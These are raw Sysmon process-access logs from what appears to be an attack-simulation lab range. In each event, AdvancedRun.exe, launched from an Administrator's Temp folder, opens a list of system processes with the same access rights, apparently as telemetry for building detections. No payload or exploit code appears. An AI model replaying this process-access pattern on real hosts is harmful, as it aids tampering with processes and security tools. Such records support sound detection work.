18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
